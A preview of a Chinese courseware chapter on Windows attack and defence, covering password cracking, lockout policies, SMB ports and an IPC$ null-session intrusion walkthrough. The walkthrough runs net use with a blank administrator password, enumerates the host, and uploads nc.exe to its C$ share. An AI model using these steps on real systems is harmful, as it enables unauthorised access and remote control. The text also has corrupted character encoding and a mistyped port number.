基于系統(tǒng)的攻擊與防御

基于系統(tǒng)的攻擊與防御

ID:45994069

大小:470.50 KB

頁(yè)數(shù):32頁(yè)

時(shí)間:2019-11-20

基于系統(tǒng)的攻擊與防御_第1頁(yè)
基于系統(tǒng)的攻擊與防御_第2頁(yè)
基于系統(tǒng)的攻擊與防御_第3頁(yè)
基于系統(tǒng)的攻擊與防御_第4頁(yè)
基于系統(tǒng)的攻擊與防御_第5頁(yè)
資源描述:

《基于系統(tǒng)的攻擊與防御》由會(huì)員上傳分享,免費(fèi)在線閱讀,更多相關(guān)內(nèi)容在教育資源-天天文庫(kù)。

1、第四章基于windows操作系統(tǒng)的攻擊與防御1.windows系統(tǒng)口令攻擊口令攻擊主要采用以下幾種方法:猜測(cè)攻擊字典攻擊窮舉攻擊混合攻擊直接破解系統(tǒng)口令文件網(wǎng)絡(luò)嗅探(sniffer)鍵盤(pán)記錄中間人攻擊社會(huì)工程學(xué)1.1Windows操作系統(tǒng)的口令破解技術(shù)1.輸入法漏洞windows2000sp2之前的版本。目前的Vista操作系統(tǒng),極點(diǎn)五筆輸入法,也存在此類(lèi)問(wèn)題。2.暴力破解SAM文件,一般使用工具LC3.刪除SAM文件1.2設(shè)置系統(tǒng)策略保護(hù)口令連接策略問(wèn)題:默認(rèn)情況下系統(tǒng)沒(méi)有設(shè)置登錄的失敗次數(shù)限制,導(dǎo)致可

2、以被無(wú)限制地嘗試連接系統(tǒng)管理的共享資源。解決方法:設(shè)置用戶的訪問(wèn)策略,定義用戶登錄失敗達(dá)到一定次數(shù)時(shí)鎖定帳號(hào),并限制管理員遠(yuǎn)程訪問(wèn)。如何實(shí)現(xiàn)?在“管理工具”中,選擇本地安全策略。在本地安全策略中選擇“帳戶安全策略”,其中的“密碼策略”可以對(duì)密碼的長(zhǎng)度、密碼的存留時(shí)間等方面進(jìn)行設(shè)置。比如:在“密碼必須符合復(fù)雜性要求”的選項(xiàng)中,系統(tǒng)默認(rèn)是停用該功能,但推薦用戶在使用時(shí)將該功能開(kāi)啟。點(diǎn)擊“帳戶鎖定策略”,可以看到三個(gè)被選項(xiàng),這里可以對(duì)帳戶的時(shí)間和帳戶無(wú)效訪問(wèn)的次數(shù)進(jìn)行設(shè)置。此處,我們點(diǎn)擊“用戶鎖定閾值”點(diǎn)右鍵,

3、選擇“安全性”,此處就可以對(duì)用戶無(wú)效訪問(wèn)次數(shù)進(jìn)行限制。由于Administrator帳號(hào)的特殊性,Administrator帳號(hào)無(wú)法設(shè)置帳號(hào)鎖定,即使登錄失敗的次數(shù)達(dá)到設(shè)置時(shí),該帳號(hào)也不可能被鎖住。因此除了系統(tǒng)默認(rèn)創(chuàng)建的Administrator帳號(hào),還應(yīng)該創(chuàng)建至少一個(gè)具有管理員特權(quán)的帳號(hào),并且,把默認(rèn)帳號(hào)Administrator改成另外一個(gè)名字。2.IPC$入侵2.1什么是IPCIPC是英文InternetProcessConnection的縮寫(xiě),即:命名管道,它是windows提供的一個(gè)通信基礎(chǔ),用

4、來(lái)在兩臺(tái)計(jì)算機(jī)進(jìn)程之間建立通信連接,而IPC后面的$是windows系統(tǒng)所使用的隱藏符號(hào),因此IPC$表示IPC共享,但是是隱藏的共享。默認(rèn)IPC是共享的。通過(guò)IPC連接,入侵者就能夠?qū)崿F(xiàn)遠(yuǎn)程控制目標(biāo)主機(jī)?;A(chǔ)知識(shí)SMB:(ServerMessageBlock)Windows協(xié)議族,用于文件打印共享的服務(wù);NBT:(NETBiosOverTCP/IP)使用137(UDP)138(UDP)139(TCP)端口實(shí)現(xiàn)基于TCP/IP協(xié)議的NETBIOS網(wǎng)絡(luò)互聯(lián)。在WindowsNT中SMB基于NBT實(shí)現(xiàn),即使用

5、139(TCP)端口;而在Windows2000中,SMB除了基于NBT實(shí)現(xiàn),還可以直接通過(guò)445端口實(shí)現(xiàn)。網(wǎng)絡(luò)共享對(duì)于端口的選擇對(duì)于win2000客戶端(發(fā)起端)來(lái)說(shuō):1如果在允許NBT的情況下連接服務(wù)器時(shí),客戶端會(huì)同時(shí)嘗試訪問(wèn)139和445端口,如果445端口有響應(yīng),那么就發(fā)送RST包給139端口斷開(kāi)連接,用455端口進(jìn)行會(huì)話,當(dāng)445端口無(wú)響應(yīng)時(shí),才使用139端口,如果兩個(gè)端口都沒(méi)有響應(yīng),則會(huì)話失??;2如果在禁止NBT的情況下連接服務(wù)器時(shí),那么客戶端只會(huì)嘗試訪問(wèn)445端口,如果445端口無(wú)響應(yīng),那么

6、會(huì)話失敗。對(duì)于win2000服務(wù)器端來(lái)說(shuō):1如果允許NBT,那么UDP端口137,138,TCP端口139,445將開(kāi)放(LISTENING);2如果禁止NBT,那么只有445端口開(kāi)放。我們建立的ipc$會(huì)話對(duì)端口的選擇同樣遵守以上原則。顯而易見(jiàn),如果遠(yuǎn)程服務(wù)器沒(méi)有監(jiān)聽(tīng)139或445端口,ipc$會(huì)話是無(wú)法建立的。2.2空會(huì)話(NullSession)攻擊概念:Null會(huì)話是同服務(wù)器建立的無(wú)信任支持的會(huì)話。一個(gè)會(huì)話包含用戶的認(rèn)證信息,而Null會(huì)話是沒(méi)有用戶的認(rèn)證信息,也就好比是一個(gè)匿名的一樣。作用:當(dāng)在

7、多域環(huán)境中,要在多域中建立信任關(guān)系,首先需要找到域中的pdc來(lái)通過(guò)安全通道的密碼驗(yàn)證,使用空會(huì)話能夠非常容易地找到pdc,還有就是關(guān)于一些系統(tǒng)服務(wù)的問(wèn)題。而且Lmhosts的#include就需要空會(huì)話的支持。攻擊過(guò)程:1).用掃描軟件搜尋存在弱口令的主機(jī)比如流光,SSS,X-scan等,然后鎖定目標(biāo),如果掃到了管理員權(quán)限的口令,假設(shè)現(xiàn)在得到了administrator的密碼為空2).然后,我們先建立起ipc$連接netuse\192.168.1.6ipc$""/user:administrator3

8、).查看遠(yuǎn)程主機(jī)開(kāi)了什么共享netview\192.168.1.6注釋:聲明用netview命令無(wú)法看到默認(rèn)共享,因此通過(guò)上面返回的結(jié)果,并不能判斷對(duì)方是否開(kāi)啟了默認(rèn)共享。4).查看遠(yuǎn)程主機(jī)的時(shí)間nettime\192.168.1.65).得到遠(yuǎn)程主機(jī)的netbios用戶名列表nbtstat-A192.168.1.6Copye:c.exe\192.168.10.15c$上傳文件nc.exe到目標(biāo)地址的c盤(pán)At\1

當(dāng)前文檔最多預(yù)覽五頁(yè),下載文檔查看全文

此文檔下載收益歸作者所有

當(dāng)前文檔最多預(yù)覽五頁(yè),下載文檔查看全文
溫馨提示:
1. 部分包含數(shù)學(xué)公式或PPT動(dòng)畫(huà)的文件,查看預(yù)覽時(shí)可能會(huì)顯示錯(cuò)亂或異常,文件下載后無(wú)此問(wèn)題,請(qǐng)放心下載。
2. 本文檔由用戶上傳,版權(quán)歸屬用戶,天天文庫(kù)負(fù)責(zé)整理代發(fā)布。如果您對(duì)本文檔版權(quán)有爭(zhēng)議請(qǐng)及時(shí)聯(lián)系客服。
3. 下載前請(qǐng)仔細(xì)閱讀文檔內(nèi)容,確認(rèn)文檔內(nèi)容符合您的需求后進(jìn)行下載,若出現(xiàn)內(nèi)容與標(biāo)題不符可向本站投訴處理。
4. 下載文檔時(shí)可能由于網(wǎng)絡(luò)波動(dòng)等原因無(wú)法下載或下載錯(cuò)誤,付費(fèi)完成后未能成功下載的用戶請(qǐng)聯(lián)系客服處理。